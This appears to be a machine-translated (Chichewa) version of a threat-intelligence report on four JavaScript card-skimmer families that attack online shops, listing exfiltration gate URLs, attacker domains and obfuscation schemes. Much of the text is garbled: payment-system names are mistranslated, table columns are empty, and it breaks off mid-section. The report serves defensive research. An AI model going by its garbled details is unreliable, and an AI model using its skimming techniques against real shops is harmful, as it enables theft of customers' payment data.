Pafupifupi tonsefe timagwiritsa ntchito malo ogulitsira pa intaneti, zomwe zikutanthauza kuti posakhalitsa timakhala pachiwopsezo chogwidwa ndi JavaScript sniffers - code yapadera yomwe owukira amakhazikitsa patsamba lawebusayiti kuti abe data yamakhadi aku banki, ma adilesi, ma logins ndi mapasiwedi a ogwiritsa ntchito. .
Pafupifupi ogwiritsa 400 a tsamba la British Airways ndi mafoni akhudzidwa kale ndi anthu onunkhiza, komanso alendo omwe adabwera patsamba la Britain la chimphona chamasewera FILA komanso wogawa matikiti ku America Ticketmaster. PayPal, Chase Paymenttech, USAePay, Moneris - awa ndi njira zina zambiri zolipirira zidakhudzidwa.
Katswiri wofufuza za Threat Intelligence Group-IB Viktor Okorokov akukamba za momwe anthu akununkhiza amalowetsa khodi ya webusayiti ndi kuba zidziwitso zolipira, komanso ma CRM omwe amawukira.
"Zowopsa zobisika"
Zidachitika kuti kwa nthawi yayitali a JS sniffers sanawonekere kwa akatswiri otsutsa ma virus, ndipo mabanki ndi machitidwe olipira sanawawone ngati chiwopsezo chachikulu. Ndipo kwathunthu pachabe. Akatswiri a Gulu-IB
Tiyeni tikhazikike mwatsatanetsatane pa mabanja anayi a onunkhiza omwe aphunziridwa pa phunziroli.
ReactGet Banja
Onunkhiza a banja la ReactGet amagwiritsidwa ntchito kuba data yamakhadi aku banki pamasamba ogula pa intaneti. Wowotchera amatha kugwira ntchito ndi njira zambiri zolipirira zomwe zimagwiritsidwa ntchito patsambali: mtengo umodzi wofananira umagwirizana ndi njira imodzi yolipira, ndipo mitundu yodziwika ya munthu wosuta angagwiritsidwe ntchito kuba zidziwitso, komanso kuba zidziwitso zamakhadi aku banki pakulipira. mitundu ya machitidwe angapo olipira nthawi imodzi, monga otchedwa sniffer yapadziko lonse lapansi. Zinapezeka kuti nthawi zina, achiwembu amachita ziwopsezo zachinyengo kwa oyang'anira sitolo pa intaneti kuti azitha kulumikizana ndi oyang'anira webusayiti.
Kampeni yogwiritsa ntchito banja la osuta iyi idayamba mu Meyi 2017; masamba omwe ali ndi CMS ndi Magento, Bigcommerce, ndi nsanja za Shopify adawukiridwa.
Momwe ReactGet imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti
Kuphatikiza pa kukhazikitsidwa kwa "classic" kwa script kudzera pa ulalo, ogwiritsira ntchito a ReactGet banja la osuta amagwiritsa ntchito njira yapadera: pogwiritsa ntchito JavaScript code, amafufuza ngati adiresi yomwe ilipo panopa yomwe wogwiritsa ntchitoyo ali nayo ikukwaniritsa zofunikira zina. Khodi yoyipa ingoperekedwa ngati chingwecho chilipo mu ulalo wapano Onani kapena sitepe imodzi yotuluka, tsamba limodzi/, kunja/onepag, tuluka/chimodzi, kukomoka/chimodzi. Chifukwa chake, nambala ya sniffer idzachitidwa ndendende panthawi yomwe wogwiritsa ntchitoyo amalipiritsa zogula ndikulowetsa zambiri zolipira mu fomu yomwe ili patsamba.
Wonunkhiza uyu amagwiritsa ntchito njira yosavomerezeka. Malipiro a wozunzidwayo ndi zidziwitso zaumwini zimasonkhanitsidwa pamodzi ndikusungidwa pogwiritsa ntchito zoyambira64, ndiyeno chingwe chotsatiracho chimagwiritsidwa ntchito ngati chizindikiro chotumizira pempho ku webusaiti ya owukira. Nthawi zambiri, njira yopita kuchipata imatsanzira fayilo ya JavaScript, mwachitsanzo resp.js, data.js ndi zina zotero, koma maulalo amafayilo azithunzi amagwiritsidwanso ntchito, GIF ΠΈ JPG. Chodabwitsa ndichakuti wowomberayo amapanga chithunzi choyezera 1 ndi 1 pixel ndipo amagwiritsa ntchito ulalo womwe adalandira kale ngati parameter. src Zithunzi. Ndiko kuti, kwa wosuta pempho lotere mumsewu liwoneka ngati pempho la chithunzi wamba. Njira yofananayi idagwiritsidwa ntchito m'banja la ImageID la onunkhiza. Kuphatikiza apo, njira yogwiritsira ntchito chithunzi cha pixel ya 1 ndi 1 imagwiritsidwa ntchito m'malemba ambiri ovomerezeka a pa intaneti, omwe amathanso kusocheretsa wogwiritsa ntchito.
Kusanthula Baibulo
Kuwunika kwa madera omwe akugwiritsidwa ntchito ndi osuta a ReactGet adawulula mitundu yambiri yosiyanasiyana ya banja ili la onunkhiza. Mabaibulo amasiyana pakakhala kapena kusakhalapo kwa obfuscation, ndipo kuwonjezera apo, aliyense wowotchera amapangidwira njira yolipirira yomwe imayang'anira kulipira kwamakhadi aku banki m'masitolo apaintaneti. Atakonza mtengo wa parameter yogwirizana ndi nambala ya mtunduwo, akatswiri a Gulu-IB adalandira mndandanda wathunthu wamitundu yosiyanasiyana yomwe ilipo, ndipo ndi mayina a mafomu omwe wosuta aliyense amawayang'ana patsamba, adazindikira njira zolipirira. kuti wonunkhiza akulinga.
Mndandanda wa onunkhiza ndi njira zawo zolipirira
Ulalo wonyengerera | Malipiro dongosolo |
---|---|
|
Lolani.Net |
Wopulumutsa | |
|
Lolani.Net |
Lolani.Net | |
|
eWAY Rapid |
Lolani.Net | |
Adyen | |
|
USAePay |
Lolani.Net | |
USAePay | |
|
Lolani.Net |
Moneris | |
USAePay | |
PayPal | |
Malipiro a Sage | |
Verisign | |
PayPal | |
Sungani | |
|
Realex |
PayPal | |
LinkPoint | |
PayPal | |
PayPal | |
DataCash | |
|
PayPal |
|
Lolani.Net |
|
Lolani.Net |
Lolani.Net | |
Lolani.Net | |
|
Verisign |
|
Lolani.Net |
Moneris | |
|
Malipiro a Sage |
|
USAePay |
|
Lolani.Net |
|
Lolani.Net |
|
ANZ eGate |
|
Lolani.Net |
|
Moneris |
|
Malipiro a Sage |
Malipiro a Sage | |
|
Chase Paymentech |
|
Lolani.Net |
|
Adyen |
PsiGate | |
Cyber ββββsource | |
ANZ eGate | |
Realex | |
|
USAePay |
|
Lolani.Net |
|
Lolani.Net |
|
ANZ eGate |
|
PayPal |
|
PayPal |
Realex | |
|
Malipiro a Sage |
|
PayPal |
|
Verisign |
Lolani.Net | |
|
Verisign |
Lolani.Net | |
|
ANZ eGate |
PayPal | |
Cyber ββββsource | |
|
Lolani.Net |
|
Malipiro a Sage |
Realex | |
|
Cyber ββββsource |
PayPal | |
PayPal | |
|
PayPal |
|
Verisign |
|
eWAY Rapid |
|
Malipiro a Sage |
Malipiro a Sage | |
|
Verisign |
Lolani.Net | |
Lolani.Net | |
|
First Data Global Gateway |
Lolani.Net | |
Lolani.Net | |
Moneris | |
|
Lolani.Net |
|
PayPal |
|
Verisign |
|
USAePay |
USAePay | |
Lolani.Net | |
Verisign | |
PayPal | |
|
Lolani.Net |
Sungani | |
|
Lolani.Net |
eWAY Rapid | |
|
Malipiro a Sage |
Lolani.Net | |
|
Wopepuka |
|
Wopepuka |
|
PayPal |
|
Malipiro a Sage |
|
Malipiro a Sage |
|
Lolani.Net |
|
PayPal |
|
Lolani.Net |
Verisign | |
|
PayPal |
|
Lolani.Net |
|
Sungani |
|
Lolani.Net |
eWAY Rapid | |
Malipiro a Sage | |
|
Lolani.Net |
Wopepuka | |
|
PayPal |
|
Malipiro a Sage |
Malipiro a Sage | |
|
Lolani.Net |
PayPal | |
Lolani.Net | |
|
Verisign |
|
Lolani.Net |
|
Lolani.Net |
|
Lolani.Net |
|
Lolani.Net |
|
Malipiro a Sage |
Malipiro a Sage | |
|
Westpac PayWay |
|
PayFort |
|
PayPal |
|
Lolani.Net |
|
Sungani |
|
First Data Global Gateway |
|
PsiGate |
Lolani.Net | |
Lolani.Net | |
|
Moneris |
|
Lolani.Net |
Malipiro a Sage | |
|
Verisign |
Moneris | |
PayPal | |
|
LinkPoint |
|
Westpac PayWay |
Lolani.Net | |
|
Moneris |
|
PayPal |
Adyen | |
PayPal | |
Lolani.Net | |
USAePay | |
EBizCharge | |
|
Lolani.Net |
|
Verisign |
Verisign | |
Lolani.Net | |
|
PayPal |
|
Moneris |
Lolani.Net | |
|
PayPal |
PayPal | |
Westpac PayWay | |
Lolani.Net | |
|
Lolani.Net |
Malipiro a Sage | |
|
Verisign |
|
Lolani.Net |
|
PayPal |
|
PayFort |
Cyber ββββsource | |
PayPal Payflow Pro | |
|
Lolani.Net |
|
Lolani.Net |
Verisign | |
|
Lolani.Net |
|
Lolani.Net |
Malipiro a Sage | |
Lolani.Net | |
|
Sungani |
|
Lolani.Net |
Lolani.Net | |
Verisign | |
|
PayPal |
Lolani.Net | |
|
Lolani.Net |
Malipiro a Sage | |
|
Lolani.Net |
|
Lolani.Net |
|
PayPal |
|
mwala |
|
PayPal |
Malipiro a Sage | |
Verisign | |
|
Lolani.Net |
|
Lolani.Net |
|
Sungani |
|
Zovuta Zebra |
Malipiro a Sage | |
|
Lolani.Net |
First Data Global Gateway | |
|
Lolani.Net |
|
eWAY Rapid |
Adyen | |
|
PayPal |
Ntchito Zamalonda a QuickBooks | |
Verisign | |
|
Malipiro a Sage |
Verisign | |
|
Lolani.Net |
|
Lolani.Net |
Malipiro a Sage | |
|
Lolani.Net |
|
eWAY Rapid |
Lolani.Net | |
|
ANZ eGate |
|
PayPal |
Cyber ββββsource | |
|
Lolani.Net |
Malipiro a Sage | |
|
Realex |
Cyber ββββsource | |
|
PayPal |
|
PayPal |
|
PayPal |
|
Verisign |
eWAY Rapid | |
|
Malipiro a Sage |
|
Malipiro a Sage |
|
Verisign |
Lolani.Net | |
|
Lolani.Net |
|
First Data Global Gateway |
Lolani.Net | |
Lolani.Net | |
|
Moneris |
|
Lolani.Net |
|
PayPal |
Wonunkhiza mawu achinsinsi
Chimodzi mwazabwino za osuta a JavaScript omwe amagwira ntchito kumbali ya kasitomala watsamba la webusayiti ndi kusinthasintha kwawo: nambala yoyipa yoyikidwa patsamba imatha kuba data yamtundu uliwonse, kaya ndalama zolipirira kapena kulowa ndi mawu achinsinsi a akaunti ya ogwiritsa ntchito. Akatswiri a Gulu-IB adapeza chitsanzo cha munthu wina wonunkhiza wa m'banja la ReactGet, yemwe adapangidwa kuti azibe ma adilesi a imelo ndi mawu achinsinsi a ogwiritsa ntchito patsamba.
Kudutsana ndi ImageID sniffer
Pakuwunika m'modzi mwa masitolo omwe ali ndi kachilomboka, zidapezeka kuti tsamba lake lidadwala kawiri: kuphatikiza pa code yoyipa ya banja la ReactGet, code of the ImageID family sniffer idapezeka. Kuphatikizikaku kutha kukhala umboni woti ogwiritsa ntchito kumbuyo kwa onsewo amagwiritsa ntchito njira zofananira pobaya nambala yoyipa.
Wonunkhiza wapadziko lonse
Kuwunika kwa amodzi mwa mayina amtundu wolumikizidwa ndi maziko a ReactGet sniffer kunawonetsa kuti wogwiritsa yemweyo adalembetsa mayina ena atatu. Madera atatuwa adatsanzira madera a mawebusayiti enieni ndipo m'mbuyomu adagwiritsidwa ntchito kuchititsa anthu osuta. Posanthula kachidindo ka malo atatu ovomerezeka, munthu wosuta wosadziwika adapezeka, ndipo kusanthula kwina kunawonetsa kuti inali mtundu wowongoleredwa wa ReactGet sniffer. Mabaibulo onse omwe ankayang'aniridwa m'mbuyomo a banja ili la osuta anali ndi ndondomeko ya malipiro amodzi, ndiko kuti, njira iliyonse yolipira inkafuna mtundu wapadera wa sniffer. Komabe, pankhaniyi, mtundu waponseponse wa sniffer unapezeka kuti amatha kuba zidziwitso kuchokera pamafomu okhudzana ndi 15 njira zosiyanasiyana zolipirira ndi ma module a e-commerce malo opangira ndalama pa intaneti.
Chifukwa chake, kumayambiriro kwa ntchitoyo, wosuta adafufuza magawo oyambira omwe ali ndi zidziwitso zamunthu wozunzidwayo: dzina lathunthu, adilesi yakuthupi, nambala yafoni.
Wonunkhizayo adasakanso ma prefixes osiyanasiyana 15 ogwirizana ndi njira zosiyanasiyana zolipirira komanso magawo olipira pa intaneti.
Kenako, zidziwitso za wozunzidwayo komanso zidziwitso zolipira zidasonkhanitsidwa pamodzi ndikutumizidwa kutsamba lomwe limayang'aniridwa ndi wowukirayo: pankhaniyi, mitundu iwiri ya sniffer yapadziko lonse ya ReactGet idapezeka, yomwe ili patsamba ziwiri zosiyana. Komabe, Mabaibulo onse anatumiza deta kubedwa yomweyo anadula malo zoobashop.com.
Kuwunikidwa kwa ma prefixes omwe wonunkhiritsa adagwiritsa ntchito posaka minda yokhala ndi zidziwitso zamalipiro za wozunzidwayo adatilola kudziwa kuti chitsanzo chonunkhizachi chinali ndi njira zolipirira zotsatirazi:
- Lolani.Net
- Verisign
- Choyamba Data
- USAePay
- Sungani
- PayPal
- ANZ eGate
- Wopepuka
- DataCash (MasterCard)
- Malipiro a Realex
- PsiGate
- Heartland Payment Systems
Ndi zida zotani zomwe zimagwiritsidwa ntchito pobera zidziwitso zamalipiro?
Chida choyamba, chomwe chidapezeka pakuwunika kwa owukirawo, chimagwiritsidwa ntchito kusokoneza zolemba zoyipa zomwe zidabera makhadi aku banki. Cholemba cha bash chogwiritsa ntchito CLI ya pulojekitiyi chinapezeka pa m'modzi mwa omwe adawukirawo
Chida chachiwiri chomwe chapezeka chidapangidwa kuti chipange khodi yomwe ili ndi udindo wotsitsa sniffer yayikulu. Chidachi chimapanga JavaScript code yomwe imayang'ana ngati wogwiritsa ntchitoyo ali patsamba lolipira pofufuza adilesi yaposachedwa ya wogwiritsayo kuti apeze zingwe. Onani, ngolo ndi zina zotero, ndipo ngati zotsatira zake zili zabwino, ndiye kuti code imanyamula sniffer yaikulu kuchokera ku seva ya owukira. Kuti mubise zochitika zoyipa, mizere yonse, kuphatikiza mizere yoyesera kuti mudziwe tsamba lolipira, komanso ulalo wolozera, amasungidwa pogwiritsa ntchito zoyambira64.
Kuukira kwa Phishing
Kuwunika kwa maukonde omwe akuwukirawo adawonetsa kuti gulu la zigawenga nthawi zambiri limagwiritsa ntchito chinyengo kuti lipeze gulu loyang'anira malo ogulitsira pa intaneti. Zigawenga zimalembetsa madera omwe amafanana ndi malo ogulitsa, kenako amatumiza fomu yolowera pagulu labodza la Magento. Ngati zipambana, owukirawo adzapeza mwayi wopita ku gulu loyang'anira la Magento CMS, lomwe limawapatsa mwayi wosintha magawo awebusayiti ndikugwiritsa ntchito sniffer kuti abe data ya kirediti kadi.
Zachilengedwe
Kasitomala | Tsiku lodziwika/mawonekedwe |
---|---|
mediapack.info | 04.05.2017 |
adsgetapi.com | 15.06.2017 |
simcounter.com | 14.08.2017 |
mageanalytics.com | 22.12.2017 |
maxstatics.com | 16.01.2018 |
reactjsapi.com | 19.01.2018 |
mxcounter.com | 02.02.2018 |
apittatus.com | 01.03.2018 |
orderracker.com | 20.04.2018 |
tagstracking.com | 25.06.2018 |
adsapigate.com | 12.07.2018 |
trust-tracker.com | 15.07.2018 |
fbstatspartner.com | 02.10.2018 |
billgetstatus.com | 12.10.2018 |
www.aldenmlilhouse.com | 20.10.2018 |
balletbeautlful.com | 20.10.2018 |
bargalnjunkie.com | 20.10.2018 |
payselector.com | 21.10.2018 |
tagsmediaget.com | 02.11.2018 |
hs-payments.com | 16.11.2018 |
ordercheckpays.com | 19.11.2018 |
geissee.com | 24.11.2018 |
gtmproc.com | 29.11.2018 |
livegetpay.com | 18.12.2018 |
sydneysalonsupplies.com | 18.12.2018 |
newrelicnet.com | 19.12.2018 |
nr-public.com | 03.01.2019 |
cloudodesc.com | 04.01.2019 |
ajaxstatic.com | 11.01.2019 |
livecheckpay.com | 21.01.2019 |
asianfoodgracer.com | 25.01.2019 |
G-Analytics Banja
Banja la onunkhiza ili limagwiritsidwa ntchito kuba makadi a kasitomala m'masitolo apaintaneti. Dzina loyamba lomwe linagwiritsidwa ntchito ndi gululi lidalembetsedwa mu Epulo 2016, zomwe zingasonyeze kuti gululi lidayamba ntchito mkati mwa 2016.
Pachitukuko chamakono, gululi limagwiritsa ntchito mayina a mayina omwe amatsanzira ntchito zenizeni, monga Google Analytics ndi jQuery, kubisa ntchito za osuta omwe ali ndi zolemba zovomerezeka ndi mayina a mayina ofanana ndi ovomerezeka. Masamba omwe akuyendetsa Magento CMS adawukiridwa.
Momwe G-Analytics imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti
Chinthu chodziwika bwino cha banja ili ndi kugwiritsa ntchito njira zosiyanasiyana zoba zidziwitso zolipira. Kuphatikiza pa jakisoni wakale wa JavaScript pagawo lamakasitomala, gulu la zigawenga lidagwiritsanso ntchito njira zojambulira ma code pagawo la seva, zomwe ndi zolemba za PHP zomwe zimasanthula zomwe zalowetsedwa ndi ogwiritsa ntchito. Njira imeneyi ndi yoopsa chifukwa imapangitsa kuti ofufuza a chipani chachitatu azindikire zizindikiro zoipa. Akatswiri a Gulu-IB adapeza mtundu wa munthu wonunkhiza wophatikizidwa mu code ya PHP ya tsambalo, pogwiritsa ntchito domain ngati chipata. dittm.org.
Mtundu wakale wa munthu wonunkhiza adapezekanso yemwe amagwiritsa ntchito dera lomwelo kuti asonkhanitse deta yabedwa dittm.org, koma mtundu uwu wapangidwa kuti ukhazikike kumbali ya kasitomala pasitolo yapaintaneti.
Pambuyo pake gululo linasintha njira zake ndikuyamba kuyang'ana kwambiri kubisa zinthu zoipa ndi kubisala.
Kumayambiriro kwa 2017, gululi lidayamba kugwiritsa ntchito domain jquery-js.com, akuwoneka ngati CDN ya jQuery: popita kumalo omwe akuwukira, wogwiritsa ntchito amatumizidwa kumalo ovomerezeka. jquery.com.
Ndipo chapakati pa 2018, gululi lidatengera dzina la domain g-analytics.com ndipo anayamba kubisa ntchito za sniffer ngati ntchito yovomerezeka ya Google Analytics.
Kusanthula Baibulo
Pakuwunika kwa madambwe omwe amagwiritsidwa ntchito kusungirako code ya sniffer, zidapezeka kuti malowa ali ndi mitundu yambiri, yomwe imasiyana pamaso pa obfuscation, komanso kukhalapo kapena kusapezeka kwa code yosafikirika yomwe imawonjezeredwa pafayilo kuti isokoneze chidwi. ndi kubisa code yoyipa.
Zonse pamalowo jquery-js.com Mitundu isanu ndi umodzi ya onunkhiza adadziwika. Onunkhiza awa amatumiza zomwe zabedwa ku adilesi yomwe ili patsamba lomwelo monga wosuta yemweyo: hxxps://jquery-js[.]com/latest/jquery.min.js:
- hxxps://jquery-js[.]com/jquery.min.js
- hxxps://jquery-js[.]com/jquery.2.2.4.min.js
- hxxps://jquery-js[.]com/jquery.1.8.3.min.js
- hxxps://jquery-js[.]com/jquery.1.6.4.min.js
- hxxps://jquery-js[.]com/jquery.1.4.4.min.js
- hxxps://jquery-js[.]com/jquery.1.12.4.min.js
Kenako domain g-analytics.com, yomwe imagwiritsidwa ntchito ndi gululi pakuwukira kuyambira pakati pa 2018, imakhala ngati malo osungira anthu ambiri onunkhiza. Pazonse, mitundu 16 yosiyanasiyana ya sniffer idapezeka. Pachifukwa ichi, chipata chotumizira deta yobedwa chinabisidwa ngati ulalo wa mawonekedwe azithunzi GIF: hxxp://g-analytics[.]com/__utm.gif?v=1&_v=j68&a=98811130&t=pageview&_s=1&sd=24-bit&sr=2560Γ1440&vp=2145Γ371&je=0&_u=AACAAEAB~&jid=1841704724&gjid=877686936&cid
= 1283183910.1527732071:
- hxxps://g-analytics[.]com/libs/1.0.1/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.10/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.11/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.12/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.13/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.14/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.15/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.16/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.3/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.4/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.5/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.6/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.7/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.8/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.9/analytics.js
- hxxps://g-analytics[.]com/libs/analytics.js
Kupanga ndalama kwa data yabedwa
Gulu la zigawenga limapanga ndalama zomwe zabedwa pogulitsa makadi kudzera mu sitolo yapansi panthaka yomwe idapangidwa mwapadera yomwe imapereka chithandizo kwa ma makhadi. Kuwunika kwa madambwe omwe adawagwiritsa ntchito adatilola kudziwa izi google-analytics.cm adalembetsedwa ndi wogwiritsa ntchito yemweyo monga domeni cardz.vc. Domain cardz.vc amatanthauza sitolo yogulitsa makhadi akubanki omwe abedwa Cardsurfs (Flysurfs), omwe adadziwika kale m'masiku a ntchito ya nsanja yamalonda ya mobisa AlphaBay monga sitolo yogulitsa makhadi a banki abedwa pogwiritsa ntchito sniffer.
Kusanthula domain analytical.is, yomwe ili pa seva yofanana ndi madomeni omwe anthu osuta amagwiritsa ntchito kuti asonkhanitse deta yabedwa, akatswiri a Gulu-IB adapeza fayilo yomwe ili ndi zipika zakuba ma cookie, zomwe zikuwoneka kuti zidasiyidwa pambuyo pake ndi wopanga mapulogalamu. Chimodzi mwazolembazo chinali ndi domeni iozoz.com, yomwe idagwiritsidwa ntchito kale m'modzi mwa osuta omwe akugwira ntchito mu 2016. Mwina, domeni iyi idagwiritsidwa ntchito kale ndi wachiwembu kuti atole makhadi omwe abedwa pogwiritsa ntchito munthu wonunkhiza. Domeni iyi idalembetsedwa ku adilesi ya imelo [imelo ndiotetezedwa], yomwe idagwiritsidwanso ntchito kulembetsa madambwe cardz.su ΠΈ cardz.vc, zokhudzana ndi sitolo yosungiramo makadi Makhadi.
Malingana ndi zomwe zapezeka, tingaganize kuti banja la G-Analytics la anthu osuta fodya komanso sitolo yapansi panthaka yogulitsa makadi a banki Makhadi amtundu amayendetsedwa ndi anthu omwewo, ndipo sitolo imagwiritsidwa ntchito kugulitsa makhadi a banki omwe abedwa pogwiritsa ntchito sniffer.
Zachilengedwe
Kasitomala | Tsiku lodziwika/mawonekedwe |
---|---|
iozoz.com | 08.04.2016 |
dittm.org | 10.09.2016 |
jquery-js.com | 02.01.2017 |
g-analytics.com | 31.05.2018 |
google-analytics.is | 21.11.2018 |
analytical.to | 04.12.2018 |
google-analytics.to | 06.12.2018 |
google-analytics.cm | 28.12.2018 |
analytical.is | 28.12.2018 |
google-analytics.cm | 17.01.2019 |
Banja la Illum
Illum ndi banja la onunkhiza omwe amagwiritsidwa ntchito kuukira masitolo apa intaneti omwe akuyendetsa Magento CMS. Kuphatikiza pa kubweretsa nambala yoyipa, ogwiritsa ntchito sniffer iyi amagwiritsanso ntchito kuyambitsa mafomu olipira abodza omwe amatumiza deta kuzipata zomwe zimayang'aniridwa ndi achiwembu.
Posanthula zida zapaintaneti zomwe zimagwiritsidwa ntchito ndi ogwiritsa ntchito sniffer iyi, zolemba zambiri zoyipa, zowononga, mafomu olipira abodza, komanso mndandanda wa zitsanzo zokhala ndi anthu oyipa ochokera kwa omwe akupikisana nawo adadziwika. Kutengera zambiri zamasiku omwe amawonekera kwa mayina omwe amagwiritsidwa ntchito ndi gululi, titha kuganiza kuti kampeni idayamba kumapeto kwa 2016.
Momwe Illum imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti
Mabaibulo oyambirira a sniffer omwe adapezeka adalowetsedwa mwachindunji mu code ya malo osokonezeka. Zomwe zabedwa zidatumizidwa ku cdn.illum[.]pw/records.php, chipatacho chinasindikizidwa pogwiritsa ntchito zoyambira64.
Pambuyo pake, mtundu wapaketi wa sniffer unapezeka womwe umagwiritsa ntchito chipata china - records.nstatistics[.]com/records.php.
Malingana ndi
Kuwunika kwawebusayiti ya omwe akuwukira
Akatswiri a Gulu-IB adapeza ndikusanthula tsamba lawebusayiti lomwe gulu la zigawenga limagwiritsa ntchito kusunga zida ndikusonkhanitsa zomwe zabedwa.
Zina mwa zida zomwe zidapezeka pa seva ya omwe akuwukirawo zinali zolembedwa ndi zopezera mwayi wokulirapo mu Linux OS: mwachitsanzo, Linux Privilege Escalation Check Script yopangidwa ndi Mike Czumak, komanso kugwiritsa ntchito CVE-2009-1185.
Owukirawo adagwiritsa ntchito ziwonetsero ziwiri mwachindunji kuukira malo ogulitsa pa intaneti:
Komanso, pakuwunika kwa seva, zitsanzo zosiyanasiyana za osuta ndi mafomu olipira zabodza adapezeka, omwe amagwiritsidwa ntchito ndi omwe akuwukira kuti atole zidziwitso zolipira kuchokera kumasamba omwe adabedwa. Monga mukuwonera pamndandanda womwe uli pansipa, zolemba zina zidapangidwa payekhapayekha patsamba lililonse lobedwa, pomwe yankho lachilengedwe linagwiritsidwa ntchito pa CMS ina ndi zipata zolipira. Mwachitsanzo, scripts segapay_standart.js ΠΈ segapay_onpage.js opangidwa kuti akhazikitsidwe pamasamba pogwiritsa ntchito njira yolipirira ya Sage Pay.
Mndandanda wamakalata azipata zosiyanasiyana zolipira
Zolemba | Njira yolipira |
---|---|
|
//request.payrightnow[.]cf/checkpayment.php |
|
//request.payrightnow[.]cf/alldata.php |
|
//request.payrightnow[.]cf/alldata.php |
|
//request.payrightnow[.]cf/alldata.php |
|
//request.payrightnow[.]cf/alldata.php |
|
//request.payrightnow[.]cf/alldata.php |
|
//request.payrightnow[.]cf/checkpayment.php |
|
//cdn.illum[.]pw/records.php |
|
//request.payrightnow[.]cf/checkpayment.php |
|
//cdn.illum[.]pw/records.php |
|
//request.payrightnow[.]cf/alldata.php |
|
//request.payrightnow[.]cf/alldata.php |
//request.payrightnow[.]cf/checkpayment.php | |
|
//request.payrightnow[.]cf/checkpayment.php |
|
//request.payrightnow[.]cf/alldata.php |
|
//cdn.illum[.]pw/records.php |
|
//cdn.illum[.]pw/records.php |
|
//request.payrightnow[.]cf/checkpayment.php |
|
//cdn.illum[.]pw/records.php |
//request.payrightnow[.]cf/checkpayment.php | |
|
//cdn.illum[.]pw/records.php |
//payrightnow[.]cf/?malipiro= | |
|
//payrightnow[.]cf/?malipiro= |
|
//paymentnow[.]tk/?malipiro= |
Wolandira paynow[.]tk, yogwiritsidwa ntchito ngati chipata mu script pay_forminsite.js, idapezeka ngati subjectAltName mumasitifiketi angapo okhudzana ndi ntchito ya CloudFlare. Kuphatikiza apo, woyang'anirayo anali ndi script zoipa.js. Kutengera dzina la script, itha kugwiritsidwa ntchito ngati gawo lakugwiritsa ntchito CVE-2016-4010, chifukwa ndizotheka kubaya code yoyipa m'munsi mwa tsamba lomwe lili ndi CMS Magento. Wolandirayo adagwiritsa ntchito script iyi ngati chipata request.requestnet[.]tkkugwiritsa ntchito satifiketi yofanana ndi yolandila paynow[.]tk.
Mafomu olipira abodza
Chithunzi chomwe chili pansipa chikuwonetsa chitsanzo cha fomu yolowetsa deta yamakhadi. Fomu iyi idagwiritsidwa ntchito kulowetsa sitolo yapaintaneti ndikuba data yamakhadi.
Chithunzi chotsatirachi chikuwonetsa chitsanzo cha fomu yolipira ya PayPal yabodza yomwe idagwiritsidwa ntchito ndi achiwembu kulowa patsamba ndi njira yolipirayi.
Zachilengedwe
Kasitomala | Tsiku lodziwika/mawonekedwe |
---|---|
cdn.illum.pw | 27/11/2016 |
records.nstatistics.com | 06/09/2018 |
request.payrightnow.cf | 25/05/2018 |
paynow.tk | 16/07/2017 |
payline.tk | 01/03/2018 |
paypal.cf | 04/09/2017 |
requestnet.tk | 28/06/2017 |
Banja la CoffeeMokko
Banja la CoffeMokko la onunkhiza, lopangidwa kuti libe makadi aku banki kwa ogwiritsa ntchito sitolo ya pa intaneti, lakhala likugwiritsidwa ntchito kuyambira Meyi 2017. Zikuoneka kuti omwe amagwira ntchito m'banja la osutawa ndi gulu la zigawenga Gulu 1, lofotokozedwa ndi akatswiri a RiskIQ mu 2016. Masamba omwe ali ndi ma CMS monga Magento, OpenCart, WordPress, osCommerce, ndi Shopify adawukiridwa.
Momwe CoffeMokko imagwiritsidwira ntchito mu code ya sitolo ya pa intaneti
Othandizira banja ili amapanga zonunkhiza zapadera pa matenda aliwonse: fayilo ya sniffer ili m'ndandanda. src kapena js pa seva ya owukira. Kuphatikizika mu code yatsamba kumachitika kudzera pa ulalo wolunjika kwa sniffer.
Khodi ya sniffer hardcodes mayina a magawo a fomu omwe deta iyenera kubedwa. Wonunkhiza amayang'ananso ngati wogwiritsa ntchitoyo ali patsamba lolipira poyang'ana mndandanda wa mawu osakira ndi adilesi yaposachedwa ya wogwiritsa ntchito.
Mabaibulo ena omwe anatulukira a sniffer adasokonezedwa ndipo anali ndi chingwe chobisika momwe zida zazikuluzikulu zimasungidwa: munali mayina a mafomu a machitidwe osiyanasiyana olipira, komanso adiresi yachipata kumene deta yobedwa iyenera kutumizidwa.
Zomwe zabedwa zolipira zidatumizidwa ku script pa seva ya owukira panjira /savePayment/index.php kapena /tr/index.php. Mwinamwake, script iyi imagwiritsidwa ntchito kutumiza deta kuchokera pachipata kupita ku seva yaikulu, yomwe imagwirizanitsa deta kuchokera kwa onse osuta. Kubisa zomwe zatumizidwa, zidziwitso zonse zolipira za wozunzidwayo zimasungidwa pogwiritsa ntchito zoyambira64, kenako kusinthana kwa zilembo zingapo kumachitika:
- zilembo za "e" zasinthidwa ndi ":"
- chizindikiro cha "w" chasinthidwa ndi "+"
- zilembo za "o" zasinthidwa ndi "%"
- zilembo za "d" zasinthidwa ndi "#"
- khalidwe "a" m'malo ndi "-"
- chizindikiro "7" chasinthidwa ndi "^"
- "h" wasinthidwa ndi "_"
- chizindikiro cha "T" chasinthidwa ndi "@"
- khalidwe "0" m'malo ndi "/"
- zilembo za "Y" zasinthidwa ndi "*"
Chifukwa cha kusintha kwa zilembo zomwe zimagwiritsidwa ntchito zoyambira64 Zambiri sizingasinthidwe popanda kusinthanso.
Umu ndi momwe kachidutswa kakang'ono kachidutswa kakang'ono kamene sikadasokonezedwe kakuwoneka ngati:
Infrastructure Analysis
